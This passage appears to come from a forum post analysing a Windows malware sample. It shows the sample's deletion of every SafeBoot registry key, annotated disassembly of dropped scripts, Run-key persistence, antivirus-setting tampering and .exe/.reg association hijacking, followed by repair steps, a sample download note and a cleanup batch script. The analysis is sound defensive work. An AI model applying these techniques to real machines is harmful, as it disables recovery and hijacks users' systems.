删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)
Continuing: <STRONG>0040DFA4 83C4 10 add esp,0x10
0040DFA7 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040DFAA 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs"
0040DFAF FF75 EC push dword ptr ss:[ebp-0x14]
0040DFB2 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040DFB7 FF75 FC push dword ptr ss:[ebp-0x4]
0040DFBA B9 04000000 mov ecx,0x4
0040DFBF E8 35E1FFFF call 样本.0040C0F9 ; creates 43.vbs at "C:\WINDOWS\system32\43.vbs"
0040E08F 83C4 10 add esp,0x10
0040E092 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E095 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat"
0040E09A FF75 EC push dword ptr ss:[ebp-0x14]
0040E09D 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040E0A2 FF75 FC push dword ptr ss:[ebp-0x4]
0040E0A5 B9 04000000 mov ecx,0x4
0040E0AA E8 4AE0FFFF call 样本.0040C0F9 ; creates 24.bat at "C:\WINDOWS\system32\24.bat"
0040E1B3 83C4 10 add esp,0x10
0040E1B6 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E1B9 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat"
0040E1BE FF75 EC push dword ptr ss:[ebp-0x14]
0040E1C1 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040E1C6 FF75 FC push dword ptr ss:[ebp-0x4]
0040E1C9 B9 04000000 mov ecx,0x4
0040E1CE E8 26DFFFFF call 样本.0040C0F9 ; creates 59.bat at "C:\WINDOWS\system32\59.bat"
0040E29E 83C4 10 add esp,0x10
0040E2A1 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E2A4 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs"
0040E2A9 FF75 EC push dword ptr ss:[ebp-0x14]
0040E2AC 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32"
0040E2B1 FF75 FC push dword ptr ss:[ebp-0x4]
0040E2B4 B9 04000000 mov ecx,0x4
0040E2B9 E8 3BDEFFFF call 样本.0040C0F9 ; creates 6.vbs at "C:\WINDOWS\system32\6.vbs"
0040E2F7 50 push eax
0040E2F8 68 04000080 push 0x80000004
0040E2FD 6A 00 push 0x0
0040E2FF 68 85BB4000 push 样本.0040BB85 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe"
0040E304 68 01030080 push 0x80000301
0040E309 6A 00 push 0x0
0040E30B 68 04000000 push 0x4
0040E310 68 03000000 push 0x3
0040E315 BB A4060000 mov ebx,0x6A4
0040E31A E8 09020000 call 样本.0040E528 ; writes a Run value named "Explore.exe" (autostart persistence); the data is the text in eax
0040E31F 83C4 28 add esp,0x28
0040E322 8B5D E8 mov ebx,dword ptr ss:[ebp-0x18]
0040E325 85DB test ebx,ebx
0040E327 74 09 je short 样本.0040E332
0040E329 53 push ebx
0040E32A E8 FF010000 call 样本.0040E52E
0040E32F 83C4 04 add esp,0x4
0040E332 68 01030080 push 0x80000301
0040E337 6A 00 push 0x0
0040E339 68 01000000 push 0x1
0040E33E 68 04000080 push 0x80000004
0040E343 6A 00 push 0x0
0040E345 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess"
0040E34A 68 01030080 push 0x80000301
0040E34F 6A 00 push 0x0
0040E351 68 04000000 push 0x4
0040E356 68 03000000 push 0x3
0040E35B BB A4060000 mov ebx,0x6A4
0040E360 E8 C3010000 call 样本.0040E528 ; sets ExecAccess back to 1
0040E365 83C4 28 add esp,0x28
0040E368 68 01030080 push 0x80000301
0040E36D 6A 00 push 0x0
0040E36F 68 01000000 push 0x1
0040E374 68 04000080 push 0x80000004
0040E379 6A 00 push 0x0
0040E37B 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess"
0040E380 68 01030080 push 0x80000301
0040E385 6A 00 push 0x0
0040E387 68 04000000 push 0x4
0040E38C 68 03000000 push 0x3
0040E391 BB A4060000 mov ebx,0x6A4
0040E396 E8 8D010000 call 样本.0040E528 ; sets MonAccess back to 1
0040E39B 83C4 28 add esp,0x28
0040E39E 68 01030080 push 0x80000301
0040E3A3 6A 00 push 0x0
0040E3A5 68 01000000 push 0x1
0040E3AA 68 04000080 push 0x80000004
0040E3AF 6A 00 push 0x0
0040E3B1 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess"
0040E3B6 68 01030080 push 0x80000301
0040E3BB 6A 00 push 0x0
0040E3BD 68 04000000 push 0x4
0040E3C2 68 03000000 push 0x3
0040E3C7 BB A4060000 mov ebx,0x6A4
0040E3CC E8 57010000 call 样本.0040E528 ; sets SiteAccess back to 1
0040E3D1 83C4 28 add esp,0x28
0040E3D4 68 01030080 push 0x80000301
0040E3D9 6A 00 push 0x0
0040E3DB 68 01000000 push 0x1
0040E3E0 68 04000080 push 0x80000004
0040E3E5 6A 00 push 0x0
0040E3E7 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess"
0040E3EC 68 01030080 push 0x80000301
0040E3F1 6A 00 push 0x0
0040E3F3 68 04000000 push 0x4
0040E3F8 68 03000000 push 0x3
0040E3FD BB A4060000 mov ebx,0x6A4
0040E402 E8 21010000 call 样本.0040E528 ; sets UDiskAccess back to 1
0040E40A 68 04000080 push 0x80000004
0040E40F 6A 00 push 0x0
0040E411 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040E416 68 04000080 push 0x80000004
0040E41B 6A 00 push 0x0
0040E41D 68 BFBB4000 push 样本.0040BBBF ; ASCII ".reg"
0040E422 68 01030080 push 0x80000301
0040E427 6A 00 push 0x0
0040E429 68 01000000 push 0x1
0040E42E 68 03000000 push 0x3
0040E433 BB A4060000 mov ebx,0x6A4
0040E438 E8 EB000000 call 样本.0040E528
Changes the .reg file association (HKCR\.reg = jpegfile).
0040E440 68 04000080 push 0x80000004
0040E445 6A 00 push 0x0
0040E447 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040E44C 68 04000080 push 0x80000004
0040E451 6A 00 push 0x0
0040E453 68 C5BB4000 push 样本.0040BBC5 ; ASCII ".exe"
0040E458 68 01030080 push 0x80000301
0040E45D 6A 00 push 0x0
0040E45F 68 01000000 push 0x1
0040E464 68 03000000 push 0x3
0040E469 BB A4060000 mov ebx,0x6A4
0040E46E E8 B5000000 call 样本.0040E528
Changes the .exe file association (HKCR\.exe = jpegfile).
0040E49D 6A 00 push 0x0
0040E49F 6A 00 push 0x0
0040E4A1 6A 00 push 0x0
0040E4A3 68 01030080 push 0x80000301
0040E4A8 6A 00 push 0x0
0040E4AA 68 14000000 push 0x14
0040E4AF 68 04000080 push 0x80000004
0040E4B4 6A 00 push 0x0
0040E4B6 68 DA904000 push 样本.004090DA
0040E4BB 68 03000000 push 0x3
0040E4C0 BB 00030000 mov ebx,0x300
0040E4C5 E8 5E000000 call 样本.0040E528 // pops up the initial message box again
0040E4CA 83C4 28 add esp,0x28
0040E4CD 8BE5 mov esp,ebp
0040E4CF 5D pop ebp
0040E4D0 C3 retn // end</STRONG>
That is as far as the code analysis goes.
Fix:
After infection, .inf, .txt, .exe and .reg files all stop working. I noticed that it does not restrict .bat and .vbs, probably because it needs to run .bat and .vbs files itself. That is the way in.
Right-click > New is gone, so just change a file's extension to ".c". I renamed the virus body itself to ".c"; double-clicking opens it. Delete all the junk inside and type:
@echo off
gpedit.msc
pause&exit
Open Group Policy and go to User Configuration > Administrative Templates > System. On the right you will see "Prevent access to registry editing tools"; open it, select "Disabled", then save and exit.
Once that has taken effect, put the following into the .bat file:
@echo off
regedit.exe
pause&exit
Save and run it, and the Registry Editor opens. Now change every registry value it modified back.
File associations can also be fixed with a batch file (taking .exe as the example):
@echo off
assoc .exe=exefile
rem %%1 and %%* are escaped: written as %1 and %* they would be replaced by the batch file's own arguments
ftype exefile="%%1" %%*
pause&exit
When that is done, run an antivirus scan.
PS: I am a newbie; if anything in the analysis is wrong or incomplete, please point it out.
样本.rar
512.33 KB, downloads: 82, download cost: 1 CB (吾爱币)
Password: 52pojie
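A cleanup batch file that collects the undo steps from the post into one script, added here as an example; it is not the original post's code. It relies on the same trick the post uses (cmd.exe starts reg.exe and runs assoc/ftype through CreateProcess, which ignores the shell association, so it still works while .exe points at jpegfile). Assumptions: the policy values were written under HKCU (root key 3 in the listing) and the associations under HKCR (root key 1); reg.exe is present (Windows XP and later); the script runs from an administrator account; and a clean export of HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot from the same Windows version is saved beside it as safeboot_clean.reg (a hypothetical file name). It goes slightly beyond the post by also clearing the HKLM copies of the same policies, since those apply to every user. The listing's zone string reads "Interner Settings", so that write may never have reached the real key; the script resets the correctly spelled key, which is the one IE reads.

```batch
@echo off
rem undo_policies.bat: reverses the registry changes listed in the analysis above.
rem Added example, not the original post's code. Assumptions: policy values were
rem written under HKCU (root key 3 in the listing), associations under HKCR
rem (root key 1), reg.exe is present, and safeboot_clean.reg (hypothetical name)
rem beside this script is a clean export of HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
rem taken from the same Windows version. Run from an administrator account.
setlocal

rem 1. File associations the sample pointed at "jpegfile". %%1/%%* are escaped so
rem    the batch file does not substitute its own arguments into the ftype value.
assoc .exe=exefile
ftype exefile="%%1" %%*
assoc .txt=txtfile
assoc .inf=inffile
assoc .reg=regfile

rem 2. Explorer/System policies. The sample wrote 1 (or the 0xFFFFFFFF drive mask);
rem    deleting the values restores the default. HKLM is cleaned too because
rem    machine-wide policies apply to every user.
for %%h in (HKCU HKLM) do (
    for %%v in (NoControlPanel NoRun NoDrives NoViewOnDrive NoFolderOptions NoDesktop NoClose NoFind NoFileMenu NoRealMode NoLogOff NoRecentDocsMenu NoViewContextMenu NoSetFolders) do (
        reg delete "%%h\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v %%v /f >nul 2>&1
    )
    reg delete "%%h\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /f >nul 2>&1
    reg delete "%%h\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Disableregistrytools /f >nul 2>&1
    reg delete "%%h\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp" /v Disabled /f >nul 2>&1

    rem 3. Internet Explorer restrictions and the home-page lock.
    for %%v in (NoFavorites NoPrinting NoBrowserOptions NoViewSource NoBrowserContextMenu) do (
        reg delete "%%h\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v %%v /f >nul 2>&1
    )
    reg delete "%%h\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /f >nul 2>&1
)

rem 4. Zone 3 (Internet) setting 1803 = file download; 0 re-enables it.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 1803 /t REG_DWORD /d 0 /f >nul

rem 5. "Show hidden files and folders" radio button. Explorer reads the HKLM copy;
rem    the HKCU copy is reset as well in case the sample's write landed there.
for %%h in (HKCU HKLM) do (
    reg add "%%h\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 1 /f >nul
)

rem 6. Autostart value named Explore.exe that the sample wrote under Run.
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Explore.exe /f >nul 2>&1

rem 7. Safe Mode: the deleted SafeBoot subkeys cannot be reconstructed from the
rem    post alone, so import a clean export from the same Windows version.
if exist "%~dp0safeboot_clean.reg" (
    reg import "%~dp0safeboot_clean.reg"
) else (
    echo safeboot_clean.reg not found: export HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot from a clean machine of the same Windows version and place it next to this script.
)

rem 8. Show whatever policy values remain; anything still listed deserves a look.
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies" /s
reg query "HKCU\Software\Policies\Microsoft\Internet Explorer" /s
endlocal
pause
```

Save it with a .bat extension (the post explains why .bat still runs), execute it, then log off and back on so Explorer re-reads the policies; the final reg query output should list no No* or Disable* values. The 360Safe\safemon values need no attention because the sample sets them back to 1 before exiting, and the script deliberately does not try to rebuild SafeBoot by hand: a partial SafeBoot tree gives a Safe Mode that boots but lacks drivers, which is worse than a clearly missing one.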